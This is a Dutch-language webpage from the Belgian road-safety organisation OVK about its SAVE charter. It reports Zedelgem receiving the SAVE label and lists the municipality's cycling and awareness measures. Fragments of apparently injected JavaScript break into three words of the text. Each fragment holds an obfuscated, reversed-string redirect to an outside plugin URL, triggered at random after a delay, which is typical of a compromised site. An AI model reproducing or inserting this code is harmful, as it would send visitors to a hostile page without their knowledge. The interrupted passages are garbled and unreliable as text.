Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Zedelgem ontvangt SAVE-label

Na Bredene, Deerlijk en Zuienkerke mocht Zedelgem als 4e in West-Vlaanderen (en als 14e in Vlaanderen) op vrijdag 9 oktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tober het SAVE-label in ontvangst nemen.

Dag na dag werk maken van een veilig verkeersgebeuren in een gemeente is niet altijd eenvoudig. Meestal zijn er niet meteen budgetten ter beschikking om infrastructurele aanpassingen uit te voeren. Daarom probeert de gemeente Zedelgem in eerste instantie sensibiliserend of repressief te werken. Indien deze maatregelen niet helpen wordt er gezocht naar middelen om de situatie verkeersveiliger te maken. Soms kan dit met kleine ingrepen zoals verkeersborden of wegmarkeringen. Indien nodig worden op langere termijn infrastructurele ingrepen gepland. Tijdens het actiejaar heeft de gemeente Zedelgem werk gemaakt van de zeven SAVE-doelstellingen.

 

 

 

 

 

 

 

 

 

 

 

 

 

Hierbij een greep uit de realisaties van het SAVE-actieplan :

  • De dooRlopende straten werden bewegwijzerd.
  • In de winter wordt er in het strooiplan ook rekening gehouden met fiets- en wandelpaden.
  • In het kader van het fietsfonds zal de gemeente Zedelgem in samenwerking met de provincie West-Vlaanderen 3 nieuwe fietspaden realiseren.
  • De leerlingen van de hoogste graad van het basisonderwijs en het secundair onderwijs kregen een vernieuwde schoolfietsroutekaart.
  • Heel wat sensibilisatiecampagnes en -acties werden georganiseerd: de STRAP-dag, Campagne ‘Met belgerinkel naar de winkel’, Campage ‘veilig fietsen’, Campage ‘Modder op de weg’, verkeersklassen, sensibilisatie en controle bij wielertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toeristen, aankoop van fietshelmen en fluojasjes voor de leerlingen van het basisonderwijs…
  • De politie engageert zich om de gids ‘Als het verkeer je raakt, praktische gids na een verkeersongeval’ ter beschikking te stellen van slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers.

© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be